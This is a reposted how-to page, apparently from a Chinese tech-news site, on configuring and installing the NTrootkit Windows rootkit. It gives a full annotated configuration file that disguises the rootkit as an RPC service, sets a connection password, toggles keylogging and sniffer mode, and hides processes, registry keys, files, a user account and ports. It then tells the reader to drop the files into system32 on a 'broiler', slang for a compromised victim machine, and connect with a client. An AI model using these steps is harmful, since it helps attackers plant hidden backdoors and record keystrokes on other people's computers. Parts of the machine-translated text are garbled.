Add to Favorites | Login | Register
Network Security Internet Technology Development Database Servers Mobile Phone Android Software Apple Software Computer Software News IT Information

In addition to Weibo, there is also WeChat

Please pay attention

WeChat public account

Shulou

About us Contact us

The configuration of Rootkit's ntrootkit uses

2025-01-27 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Network Security >

Share

Shulou(Shulou.com)06/01 Report--

NTrootkit

First, configuration method

\\ filename:ntrootkit.ini

\\ This is the init file of yyt_hac's ntrootkit,please modify it correctly or the rootkit

\\ can't be installedhands!

[GLOBAL] / / the following is the configuration

\\ servicename is the ntrootkit's servicename

Servicename=tsserver / / Service name

Servdispname=rpcsvr

Servdescription=windows system rpc server

Installdir=com\ sserver / / installation directory

Connpass=12345 / / connection password

Appname=51cto.exe

Keylog=0 / / 0 means keyboard is not recorded

Workmode=1 / / 0 is sniffer mode

[HIDDEN PROCNAME] / / Service name to be hidden

51cto

[HIDDEN REGKEY] / / Registry keys to be hidden

Zero\ soft\...\...\ xxx

[HIDDEN REGVALUE] / / Registry key value to be hidden

Zero\ soft\...

[HIDDEN FILEDIR] / / File directory to be hidden

C:\ rootkit

[HIDDEN SERVICE] / / Service name to be hidden

Servicert

[HIDDEN USER] / / user name to hide

Zerosecurity

[HIDDEN TCPPORT] / / tcp port to be hidden

Tcpport=5768

[HIDDEN UDPPORT] / / udp port to be hidden

Udpport=4000

Second, method of use

①: put the configuration file .ini and server ntrootkit.exe in the system32 directory of the broiler, and then run the ntrootkit.exe installation; ntrootkit-u password can be uninstalled

②: clients connect with rtclient

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.

Views: 0

*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.

Tag Search: Service configuration directory file method registry port usage content customer client password mode user user name broiler keyboard run vpn macOS Linux MariaDB MySQL Docker Shulou Information Shulou Technology Shulou Tech Info OPPO Reno Redmi Xiaomi NVidia Microsoft Huawei Apple MariaDB macOS Linux Redmi Docker Xiaomi NVidia Shulou Tech Info Apple OPPO Reno MySQL Huawei Shulou Technology vpn Microsoft Shulou Information MariaDB macOS Linux Redmi Docker Xiaomi NVidia Shulou Tech Info Apple OPPO Reno MySQL Huawei Shulou Technology vpn Microsoft Shulou Information

Share To

Related

Network Security

More Network Security >

Latest Network Security More Network Security >

Latest Internet Technology More Internet Technology >

Latest Development More Development >

Latest Database More Database >

Latest Servers More Servers >

Latest Mobile Phone More Mobile Phone >

Latest Android Software More Android Software >

Latest Apple Software More Apple Software >

Latest Computer Software News More Computer Software News >

Latest IT Information More IT Information >

Wechat

About us Contact us Product review car news thenatureplanet

© 2024 shulou.com SLNews company. All rights reserved.

12
Report